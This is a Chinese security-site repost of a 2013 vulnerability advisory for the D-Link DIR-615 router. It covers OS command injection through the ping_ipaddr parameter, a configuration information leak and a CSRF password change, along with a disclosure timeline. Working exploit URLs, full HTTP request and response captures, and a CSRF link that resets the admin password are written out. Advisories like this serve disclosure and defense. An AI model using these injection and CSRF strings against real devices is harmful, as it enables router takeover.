Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / D-Link DIR-615多个远程安全漏洞

发布日期:2013-02-11
更新日期:2013-06-08受影响系统:
D-Link DIR-615
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57882
 
D-Link Wireless N 300 Router (DIR-615)是款无线路由器产品。 D-Link DIR-615存在由于ping_ipaddr参数内缺少输入验证检查造成的远程OS命令注入、信息泄露、跨站请求伪造多个安全漏洞,利用这些漏洞可使攻击者泄露敏感信息、执行任意操作、在受影响设备上下文中执行任意命令。
 
<*来源:Michael Messner (michae.messner@integralis.com)
 
 链接:http://www.s3cur1ty.de/m1adv2013-008
       http://www.osvdb.org/90174
 *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Device Name: DIR-615 - Hardware revision H1
 Vendor: D-Link ============ Device Description: ============Delivering great wireless performance, network security and coverage, the D-Link Wireless N 300 Router (DIR-615) is ideal for upgrading your existing wireless home network. Source: http://www.dlink.com/us/en/support/product/dir-615-wireless-n-300-router ============  Vulnerable Firmware Releases: ============Firmware Version :  8.04, Tue, 4, Sep, 2012
 Firmware Version :  8.04, Fri, 18, Jan, 2013
 ============ Vulnerability Overview: ============
* OS-Command Injection:
   => Parameter: ping_ipaddr The vulnerability is caused by missing input validation in the ping_ipaddr parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd or upload and execute a backdoor to compromise the device.
 You need to be authenticated to the device or you have to find other methods for inserting the malicious commands. Example Exploit: http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60COMMAND%60&ping6_ipaddr=
 http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60uname%20-a%60&ping6_ipaddr= Request:
 GET /tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60uname%20-a%60&ping6_ipaddr= HTTP/1.1
 Host: 192.168.178.199
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
 Accept: */*
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Referer: http://192.168.178.199/adv_virtual_batch.htm
 Connection: keep-alive Response:
 HTTP/1.0 200 OK
 Pragma: no-cache
 Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
 <html>
 <head>
 <script type="text/javascript" src="common.js.htm"></script>
 <script language="javascript">
 CommJs({init:INC_COMM_PAGE,group:PAGE_GROUP_TOOLS});
 var pingResult="Domain";
 var pingip="ipv4_1.1.1.1Linux DIR-615 2.6.21 #2 Fri Jan 18 16:42:24 CST 2013 mips unknown"; <<==
 var vctinfo= [
 {ethport:"0", status:"0", rate:"0", dup:"0"},
 {ethport:"1", status:"0", rate:"0", dup:"0"},
 {ethport:"2", status:"0", rate:"0", dup:"0"}, You have wget on the device for downloading further tools. * Information Disclosure: Detailed device information with configuration details. Request:
 http://192.168.178.199/gconfig.htm Response:
 var ModelName = "DIR-615"; var systemName="DLINK-DIR615"; var FunctionList = {HAS_PRIORITY_WEB_ACCOUNT:1,PRIORITY_WEB_ACCOUNT_NUM:1,HAS_IPV6_AUTO_CONFIG:1,DHCPD_HAS_OPTION_66:1,SUPPORT_WPS_DISABLE_PINCODE:1,SUPPORT_IPV6_DSLITE:1,HAS_IPV6_6RD:0,NON_USED:0}* For changing the current password there is no request to the current password With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser. POST /tools_admin.htm HTTP/1.1
 Host: 192.168.178.199
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Referer: http://192.168.178.199/tools_admin.htm
 Cookie: uid=wBIfbpFoJ9
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 77 page=tools_admin&admin_password1=admin&admin_password2=admin&hostname=DIR-615 * CSRF for changing the password without knowing the current one: http://192.168.178.199/tools_admin.htm?page=tools_admin&admin_password1=admin2&admin_password2=admin2&hostname=DIR-615 ============ Solution ============ No known solution available. ============ Credits ============ The vulnerability was discovered by Michael Messner
 Mail: devnull#at#s3cur1ty#dot#de
 Web: http://www.s3cur1ty.de/advisories
 Twitter: @s3cur1ty_de ============ Time Line: ============ November 2012 - discovered vulnerability
 11.11.2012 - contacted dlink via the webinterface http://www.dlink.com/us/en/support/contact-support
 20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D-Link
 21.12.2012 - D-link responded that they will check the findings *h00ray*
 11.01.2013 - requested status update
 25.01.2013 - requested status update
 25.01.2013 - D-Link responded that this is a security problem from the user and/or browser and they will not provide a fix
 xx.02.2013 - no update from dlink, public release建议:
--------------------------------------------------------------------------------
厂商补丁:
 
D-Link
 ------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://www.dlink.com/PHP quoted_printable_encode()堆缓冲区溢出漏洞(CVE-2013-2110)IBM AIX IPv6报文处理远程拒绝服务漏洞相关资讯      D-Link安全漏洞 
  • 多个D-Link产品UPnP SOAP接口命令  (07/11/2013 21:42:37)
  • D-Link DNS-323 ShareCenter 远程  (05/04/2013 07:12:30)
  • D-Link DIR-865L 跨站请求伪造漏洞  (04/23/2013 08:07:29)
  • D-Link多款产品命令注入漏洞(CVE-  (05/11/2013 06:09:15)
  • 多个D-Link网络摄像机产品硬编码凭  (05/04/2013 07:11:55)
  • 多个D-Link产品命令注入和信息泄露  (04/09/2013 13:38:02)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款
版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图